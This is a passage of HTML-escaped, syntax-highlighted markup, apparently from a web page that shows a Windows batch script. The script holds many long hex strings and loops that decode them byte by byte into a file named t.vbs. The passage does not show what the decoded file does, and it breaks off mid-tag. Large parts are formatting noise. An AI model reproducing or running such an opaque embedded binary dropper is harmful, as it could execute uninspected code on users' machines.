-moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2D531F5DE9F30C3216F97799180A30183BF83D68117E2179544808C427C361AE6441D9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6EF296699DDD7C170B843357E9ED350D308DF56687DFEDD14D741B010022B2D4DC60AE"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"1DDD0AFF6AB15A1B53E128AA6BA8BFD36C8FB9B6095B93538934D6C65457D43ACC635A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2CF2C76CD1F551CB58E437958C45C314A1251FCB29B5A8FCBE1C984C3FC86C20E5F0AB"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"037B6700695E4E9641B9087EF3218F7FFF907E7755D4DEC12420DB36CD77CDF2AE0329"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FC1BABDB4303B1C7CF7DCF153CFE006C83DF724D206A7A5D02BF108790A9509F0B6D36"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"803EC06FB56EF2FBB22B815557432A016E3D7140AA8631A2696B3BB4AEA75F771DF9AA"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2B43E6002CDFD879901CB46F0DB4F5FFF66B2EDCC7BA68B2005225D4DBA06CA65FAA65"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"880572D1A48A42AE805C0DFDEE6C3D6D29F65B0725FCDE2C984CB8778BDF9846FA7D5A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"87DF58A96421CC73215C13E8BF852411F22A9206BFD1642E6980B60E3A5239F46460DE"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D83E155A25C23511304C827F092485CCA3F092C80418EFFADFC2F5E1B8104A1BBD34DC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"06250950DA0C9CC1D6B974C69B2865D6C37CF1FBDE7F066C7E39AD17C29D1C80540BD7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"11280E5A423A22660DF05B052D2176A5382FF7B6ACF1E2ECA359DDCFE26E2571D0574F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B1AA222CB461FE1BF9F80B6061A2A354418D13EAB16639C0350FCF0165341A247613A5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"BD19A0D1EF1B13C535638DE5E8CFF113FFF2A89519FF7BC4F8174B3F9E7EFDEF124F90"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"EEA25F577FFFEAFB570F7A6D1611B74688EF1BCE7C67CA7FCEBAE1FC8BC5BF9DBD3D69"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D29280A90FDDAD5EDFDB74F5ABA898D73FFED2705DFBFC007E071DD2EF70AFC4FB097A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2CEFF29687BF110F49EECD8B566FE40FED7AD438F5C1DE7BC8CF0570CFF02F77E8FFC6"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"1F30BD0A44745BE2F6C41D89A713BB12FB9306938CAA0DAAC7552FAA5E57BDAFFA54F5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8D6A62F2B4E4B8E445C9A9C9B9C995C9CDC96F257F9CBC26A539E58F298752CEA690D4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D05475AA29D59CCAA6FE21B523F5E6C5E58BB72D7E7AF10B8BE7A4C5A725A6A5A669D2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B2D37469BF4E33A4DD91764F5A73DA93697F4E7B33AD3DEDBDB48FD22EA45D4A23EA20"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F564F5CDEA79EA04759EFA56B55E6D5457AA6BD476F5C3EADFAB9F56BFA0DEA57E53FD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"81FA94FA73F579B5345D913E2D3D267D617A7A7A767A41BA3EDD985E965E957E67BA3D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"BD31BD259D4BFF4BFAEBE9524D84E606CD5CCD079AD39ACC8C5B335665D833DEC93894"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C167081916EDF3DA0EEDC7DA2E2DAFEDD30E69A764CEC84CCE4CCFCCCECCCF5C9AB922"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"734DE61D99EB33EB32D9CCCD99AE4C2EF391CC3F643E9FB92BF3EF997B33FF99F941E6"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C9CCAF337B332F64FE9429CD9A9C7573567C567A9631AB2A8BC9BA3B8BCB7A3CEB2F59"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6D59ED599F647D9EF54396F83F58E8474D903035E157091909B9097724342434253C92"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F072427B42574258E2ECC47989B989AB1277257E987836F1DBC42B89B149C5496B922C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"497549F724FD7BD25F93DA938E270D25A5A9B25445AA55AA47548FA9FEA4DAA53A4CB9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"33A092254F07FE2C48CE49BE27F981E44793F72677249F493E9F2C4F35A436A5BA53FF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"983A7571CCE2AD8BEF5FFCC7C52F2E3EBCB873F1B78B43D3E6005FB6A4FD366D67DA2B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C005212D4CBD327D7DFAD6F447D3F7A61F4EEF4CFF3C7DA366AFE6AA2623A324E39E8C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FB331ECE7831A3376387F6196D48A63AB339F395CCD733C3B222B372B39667ADCCBA33"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6B6BD653592F67FD57D667595F67A173802F200427CC4E488039E72494249427BC95F0"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"51C28F09C1894A98EF23899F247E9178217146D22D49B7263D93F4F7A4B3499EA41F92"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C2551B556FA84EABFA5543AAD8E484E4CDC9FF96BC27F99DE40F92BF4E2E497924A52D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A533A52B2524754A6A55EAEF52BF4CFD3E75DDE286C5AF2C5E9156965699F662DA0769"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9EB40075BDBA45FD90FA2D7570FA449092A2F4E530AFFBD29F487F2EBD0DE6B64E53AF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D9A47954F3B5E6A266424678465BC6B98CF319C1DA28ED226D8ED6AABD4BDBA46DD13E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AD3DAF15B43765E66596673E953994B936EBA1AC3F64898111EAE0CF127E4A90240625"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4E489C9838293132717AE22CE0E4E2C4D5890713BF4B2C48DA90D498E44E7A2CE96852"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"942A5EB530657BCAA6D447529F4E6D4BFD34F54CEAB9D4AF52BF493D9F7A217520F5C7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D4ABA98AC58D8B5F5AFC2E706649DABAB4BAB4B7D3BE4FD3C32C5E531F57F7AA07D5EA"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7436FD50FA17E93FA4CB3526CD439A739ADC8C77B519990599B7655A335FCC0CC902D3"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"071E0921CF27252F9EA34E5267C24AAA525BD4CDEA07D47F8235F48EFAA0BA5BCDABFF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a 